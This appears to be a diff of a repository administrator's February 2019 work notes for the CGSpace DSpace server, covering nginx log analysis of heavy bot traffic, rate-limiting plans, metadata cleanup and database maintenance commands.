<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;03/Feb/2019&quot; | grep 195.201.104.240 | grep -o -E '03/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 20
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;03/Feb/2019&#34; | grep 195.201.104.240 | grep -o -E &#39;03/Feb/2019:0[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 20
19 03/Feb/2019:07:42
20 03/Feb/2019:07:12
21 03/Feb/2019:07:27
@ -262,7 +262,7 @@ sys 0m1.979s
</code></pre><ul>
<li>At least they re-used their Tomcat session!</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240' dspace.log.2019-02-03 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=195.201.104.240&#39; dspace.log.2019-02-03 | sort | uniq | wc -l
1
</code></pre><ul>
<li>This user was making requests to <code>/browse</code>, which is not currently under the existing rate limiting of dynamic pages in our nginx config
@ -287,7 +287,7 @@ COPY 321
<li>Discuss the new IITA research theme field with Abenet and decide that we should use <code>cg.identifier.iitatheme</code></li>
<li>This morning there was another alert from Linode about the high load on CGSpace (linode18), here are the top IPs in the web server logs before, during, and after that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;04/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;04/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
589 2a01:4f8:140:3192::2
762 66.249.66.219
889 35.237.175.180
@ -318,12 +318,12 @@ COPY 321
</code></pre><ul>
<li>Testing the corrections for sixty-five items and sixteen deletions using my <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a> and <a href="https://gist.github.com/alanorth/bd7d58c947f686401a2b1fadc78736be">delete-metadata-values.py</a> scripts:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p 'fuu' -d
$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p 'fuu' -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-02-04-Correct-65-CTA-Subjects.csv -f cg.subject.cta -t CORRECT -m 124 -db dspace -u dspace -p &#39;fuu&#39; -d
$ ./delete-metadata-values.py -i 2019-02-04-Delete-16-CTA-Subjects.csv -f cg.subject.cta -m 124 -db dspace -u dspace -p &#39;fuu&#39; -d
</code></pre><ul>
<li>I applied them on DSpace Test and CGSpace and started a full Discovery re-index:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Peter had marked several terms with <code>||</code> to indicate multiple values in his corrections so I will have to go back and do those manually:</li>
@ -344,7 +344,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>Then I used <code>csvcut</code> to get only the CTA subject columns:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c &quot;id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]&quot; /tmp/cta.csv &gt; /tmp/cta-subjects.csv
<pre tabindex="0"><code>$ csvcut -c &#34;id,collection,cg.subject.cta,cg.subject.cta[],cg.subject.cta[en_US]&#34; /tmp/cta.csv &gt; /tmp/cta-subjects.csv
</code></pre><ul>
<li>After that I imported the CSV into OpenRefine where I could properly identify and edit the subjects as multiple values</li>
<li>Then I imported it back into CGSpace:</li>
@ -354,7 +354,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<li>Another day, another alert about high load on CGSpace (linode18) from Linode</li>
<li>This time the load average was 370% and the top ten IPs before, during, and after that time were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
689 35.237.175.180
1236 5.9.6.51
1305 34.218.226.147
@ -368,7 +368,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>Looking closer at the top users, I see <code>45.5.186.2</code> is in Brazil and was making over 100 requests per minute to the REST API:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E '06/Feb/2019:0[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 | grep 45.5.186.2 | grep -o -E &#39;06/Feb/2019:0[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 10
118 06/Feb/2019:05:46
119 06/Feb/2019:05:37
119 06/Feb/2019:05:47
@ -382,7 +382,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>I was thinking of rate limiting those because I assumed most of them would be errors, but actually most are HTTP 200 OK!</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E '06/Feb/2019' | grep 45.5.186.2 | awk '{print $9}' | sort | uniq -c
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#39;06/Feb/2019&#39; | grep 45.5.186.2 | awk &#39;{print $9}&#39; | sort | uniq -c
10411 200
1 301
7 302
@ -392,7 +392,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>I should probably start looking at the top IPs for web (XMLUI) and for API (REST and OAI) separately:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
328 220.247.212.35
372 66.249.66.221
380 207.46.13.2
@ -403,7 +403,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
1236 5.9.6.51
1554 66.249.66.219
4942 85.25.237.71
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;06/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;06/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
10 66.249.66.221
26 66.249.66.219
69 5.143.231.8
@ -419,7 +419,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
<li>Linode sent an alert last night that the load on CGSpace (linode18) was over 300%</li>
<li>Here are the top IPs in the web server and API logs before, during, and after that time, respectively:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;06/Feb/2019:(17|18|19|20|23)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;06/Feb/2019:(17|18|19|20|23)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 66.249.66.209
6 2a01:4f8:210:51ef::2
6 40.77.167.75
@ -430,7 +430,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
20 95.108.181.88
27 66.249.66.219
2381 45.5.186.2
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;06/Feb/2019:(17|18|19|20|23)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;06/Feb/2019:(17|18|19|20|23)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
455 45.5.186.2
506 40.77.167.75
559 54.70.40.11
@ -444,7 +444,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
</code></pre><ul>
<li>Then again this morning another alert:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;07/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;07/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
5 66.249.66.223
8 104.198.9.108
13 110.54.160.222
@ -455,7 +455,7 @@ PESCAS E AQUACULTURE,PISCICULTURA||AQUACULTURE
4529 45.5.186.2
4661 205.186.128.185
4661 70.32.83.92
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;07/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;07/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
145 157.55.39.237
154 66.249.66.221
214 34.218.226.147
@ -513,7 +513,7 @@ Please see the DSpace documentation for assistance.
<li>Linode sent alerts about CPU load yesterday morning, yesterday night, and this morning! All over 300% CPU load!</li>
<li>This is just for this morning:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;09/Feb/2019:(07|08|09|10|11)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;09/Feb/2019:(07|08|09|10|11)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
289 35.237.175.180
290 66.249.66.221
296 18.195.78.144
@ -524,7 +524,7 @@ Please see the DSpace documentation for assistance.
742 5.143.231.38
1046 5.9.6.51
1331 66.249.66.219
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;09/Feb/2019:(07|08|09|10|11)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;09/Feb/2019:(07|08|09|10|11)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
4 66.249.83.30
5 49.149.10.16
8 207.46.13.64
@ -547,7 +547,7 @@ Please see the DSpace documentation for assistance.
<ul>
<li>Linode sent another alert about CGSpace (linode18) CPU load this morning, here are the top IPs in the web server XMLUI and API logs before, during, and after that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
232 18.195.78.144
238 35.237.175.180
281 66.249.66.221
@ -558,7 +558,7 @@ Please see the DSpace documentation for assistance.
444 2a01:4f8:140:3192::2
1171 5.9.6.51
1196 66.249.66.219
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
6 112.203.241.69
7 157.55.39.149
9 40.77.167.178
@ -572,16 +572,16 @@ Please see the DSpace documentation for assistance.
</code></pre><ul>
<li>Another interesting thing might be the total number of requests for web and API services during that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE &quot;10/Feb/2019:0(5|6|7|8|9)&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -cE &#34;10/Feb/2019:0(5|6|7|8|9)&#34;
16333
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE &quot;10/Feb/2019:0(5|6|7|8|9)&quot;
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -cE &#34;10/Feb/2019:0(5|6|7|8|9)&#34;
15964
</code></pre><ul>
<li>Also, the number of unique IPs served during that time:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
1622
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;10/Feb/2019:0(5|6|7|8|9)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;10/Feb/2019:0(5|6|7|8|9)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
95
</code></pre><ul>
<li>It&rsquo;s very clear to me now that the API requests are the heaviest!</li>
@ -643,7 +643,7 @@ Please see the DSpace documentation for assistance.
<li>On a similar note, I wonder if we could use the performance-focused <a href="https://libvips.github.io/libvips/">libvps</a> and the third-party <a href="https://github.com/codecitizen/jlibvips/">jlibvips Java library</a> in DSpace</li>
<li>Testing the <code>vipsthumbnail</code> command line tool with <a href="https://cgspace.cgiar.org/handle/10568/51999">this CGSpace item that uses CMYK</a>:</li>
</ul>
<pre tabindex="0"><code>$ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o '%s.jpg[Q=92,optimize_coding,strip]'
<pre tabindex="0"><code>$ vipsthumbnail alc_contrastes_desafios.pdf -s 300 -o &#39;%s.jpg[Q=92,optimize_coding,strip]&#39;
</code></pre><ul>
<li>(DSpace 5 appears to use JPEG 92 quality so I do the same)</li>
<li>Thinking about making &ldquo;top items&rdquo; endpoints in my <a href="https://github.com/ilri/dspace-statistics-api">dspace-statistics-api</a></li>
@ -693,7 +693,7 @@ dspacestatistics=# SELECT * FROM items WHERE downloads &gt; 0 ORDER BY downloads
<li>Thierry from CTA is having issues with his account on DSpace Test, and there is no admin password reset function on DSpace (only via email, which is disabled on DSpace Test), so I have to delete and re-create his account:</li>
</ul>
<pre tabindex="0"><code>$ dspace user --delete --email blah@cta.int
$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password 'blah'
$ dspace user --add --givenname Thierry --surname Lewyllie --email blah@cta.int --password &#39;blah&#39;
</code></pre><ul>
<li>On this note, I saw a thread on the dspace-tech mailing list that says this functionality exists if you enable <code>webui.user.assumelogin = true</code></li>
<li>I will enable this on CGSpace (<a href="https://github.com/ilri/DSpace/pull/411">#411</a>)</li>
@ -728,14 +728,14 @@ $ podman run --name dspacedb -v /home/aorth/.local/lib/containers/volumes/dspace
</code></pre><ul>
<li>After running the playbook CGSpace came back up, but I had an issue with some Solr cores not being loaded (similar to last month) and this was in the Solr log:</li>
</ul>
<pre tabindex="0"><code>2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2018': Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
<pre tabindex="0"><code>2019-02-14 18:17:31,304 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2018&#39;: Unable to create core [statistics-2018] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2018/data/index/write.lock
</code></pre><ul>
<li>The issue last month was address space, which is now set as <code>LimitAS=infinity</code> in <code>tomcat7.service</code>&hellip;</li>
<li>I re-ran the Ansible playbook to make sure all configs etc were the, then rebooted the server</li>
<li>Still the error persists after reboot</li>
<li>I will try to stop Tomcat and then remove the locks manually:</li>
</ul>
<pre tabindex="0"><code># find /home/cgspace.cgiar.org/solr/ -iname &quot;write.lock&quot; -delete
<pre tabindex="0"><code># find /home/cgspace.cgiar.org/solr/ -iname &#34;write.lock&#34; -delete
</code></pre><ul>
<li>After restarting Tomcat the usage statistics are back</li>
<li>Interestingly, many of the locks were from last month, last year, and even 2015! I&rsquo;m pretty sure that&rsquo;s not supposed to be how locks work&hellip;</li>
@ -795,10 +795,10 @@ $ podman volume create dspacedb_data
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost dspace_2019-02-11.backup
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
</code></pre><ul>
<li>And it&rsquo;s all running without root!</li>
<li>Then re-create my Artifactory container as well, taking into account ulimit open file requirements by Artifactory as well as the user limitations caused by rootless subuid mappings:</li>
@ -818,12 +818,12 @@ $ podman start artifactory
<li>I ran DSpace&rsquo;s cleanup task on CGSpace (linode18) and there were errors:</li>
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(162844) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(162844) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (162844);&#39;
UPDATE 1
</code></pre><ul>
<li>I merged the Atmire Metadata Quality Module (MQM) changes to the <code>5_x-prod</code> branch and deployed it on CGSpace (<a href="https://github.com/ilri/DSpace/pull/407">#407</a>)</li>
@ -834,7 +834,7 @@ UPDATE 1
<li>Jesus fucking Christ, Linode sent an alert that CGSpace (linode18) was using 421% CPU for a few hours this afternoon (server time):</li>
<li>There seems to have been a lot of activity in XMLUI:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
1236 18.212.208.240
1276 54.164.83.99
1277 3.83.14.11
@ -845,7 +845,7 @@ UPDATE 1
1327 52.54.252.47
1477 5.9.6.51
1861 94.71.244.172
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
8 42.112.238.64
9 121.52.152.3
9 157.55.39.50
@ -856,15 +856,15 @@ UPDATE 1
28 66.249.66.219
43 34.209.213.122
178 50.116.102.77
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
2727
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq | wc -l
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq | wc -l
186
</code></pre><ul>
<li>94.71.244.172 is in Greece and uses the user agent &ldquo;Indy Library&rdquo;</li>
<li>At least they are re-using their Tomcat session:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172' dspace.log.2019-02-18 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=94.71.244.172&#39; dspace.log.2019-02-18 | sort | uniq | wc -l
</code></pre><ul>
<li>
<p>The following IPs were all hitting the server hard simultaneously and are located on Amazon and use the user agent &ldquo;Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0&rdquo;:</p>
@ -886,7 +886,7 @@ UPDATE 1
<p>For reference most of these IPs hitting the XMLUI this afternoon are on Amazon:</p>
</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;18/Feb/2019:1(2|3|4|5|6)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 30
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;18/Feb/2019:1(2|3|4|5|6)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 30
1173 52.91.249.23
1176 107.22.118.106
1178 3.88.173.152
@ -920,7 +920,7 @@ UPDATE 1
</code></pre><ul>
<li>In the case of 52.54.252.47 they are only making about 10 requests per minute during this time (albeit from dozens of concurrent IPs):</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E '18/Feb/2019:1[0-9]:[0-9][0-9]' | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep 52.54.252.47 | grep -o -E &#39;18/Feb/2019:1[0-9]:[0-9][0-9]&#39; | uniq -c | sort -n | tail -n 10
10 18/Feb/2019:17:20
10 18/Feb/2019:17:22
10 18/Feb/2019:17:31
@ -935,7 +935,7 @@ UPDATE 1
<li>As this user agent is not recognized as a bot by DSpace this will definitely fuck up the usage statistics</li>
<li>There were 92,000 requests from these IPs alone today!</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0'
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -c &#39;Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0&#39;
92756
</code></pre><ul>
<li>I will add this user agent to the <a href="https://github.com/ilri/rmg-ansible-public/blob/master/roles/dspace/templates/nginx/default.conf.j2">&ldquo;badbots&rdquo; rate limiting in our nginx configuration</a></li>
@ -943,7 +943,7 @@ UPDATE 1
<li>IWMI sent a few new ORCID identifiers for us to add to our controlled vocabulary</li>
<li>I will merge them with our existing list and then resolve their names using my <code>resolve-orcids.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq &gt; /tmp/2019-02-18-combined-orcids.txt
<pre tabindex="0"><code>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml 2019-02-18-IWMI-ORCID-IDs.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort | uniq &gt; /tmp/2019-02-18-combined-orcids.txt
$ ./resolve-orcids.py -i /tmp/2019-02-18-combined-orcids.txt -o /tmp/2019-02-18-combined-names.txt -d
# sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
@ -956,7 +956,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
<li>Unfortunately, I don&rsquo;t see any strange activity in the web server API or XMLUI logs at that time in particular</li>
<li>So far today the top ten IPs in the XMLUI logs are:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;19/Feb/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;19/Feb/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
11541 18.212.208.240
11560 3.81.136.184
11562 3.88.237.84
@ -978,7 +978,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
</li>
<li>The top requests in the API logs today are:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;19/Feb/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;19/Feb/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
42 66.249.66.221
44 156.156.81.215
55 3.85.54.129
@ -999,17 +999,17 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
